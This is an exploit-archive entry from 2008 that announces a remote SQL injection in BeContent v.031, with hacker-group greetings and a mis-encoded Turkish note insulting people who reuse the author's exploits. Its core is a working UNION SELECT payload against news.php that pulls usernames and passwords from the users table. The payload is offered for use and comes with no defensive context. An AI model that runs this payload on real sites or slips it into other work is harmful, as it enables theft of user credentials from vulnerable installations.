[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BeContent v.031 (id) Remote SQL Injection Vulnerability
# Published : 2008-02-21
# Author : Cr@zy_King
# Previous Title : PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability
# Next Title : OSSIM 0.9.9rc5 (XSS/SQL Injection) Multiple Remote Vulnerabilities
Founder By Cr@zy_King
HackShow.Us
BeContent v.031 (id) Remote Sql Vuln.
Down : http://code.google.com/p/becontent/downloads/list?id_menu=9
Exploit:
news.php?id=-3+union+select+1,concat_ws(0x3a,username,password),3,4+from+users
Greatz : Barakuda (GraBBerZ team) & Crackers_Child & Eno7 & DreamTurk & Gencturk & Constantine
Not : Ayyildiz 'da Askeri ??urada Yayinlad?±g?±m A?§?±klar?± Kullananlar?±n hepsinin a.q yyim bunlar?±da kullananlar?±nda a.qyyim
Alay?±na ?°syan Kral?±na Hodri Meydan Sozum Metehan'a ;) Hadi eyw.
side note: seems this vulnerability was found around a month earlier by (GraBBerZ TeaM)
# www.Syue.com [2008-02-21]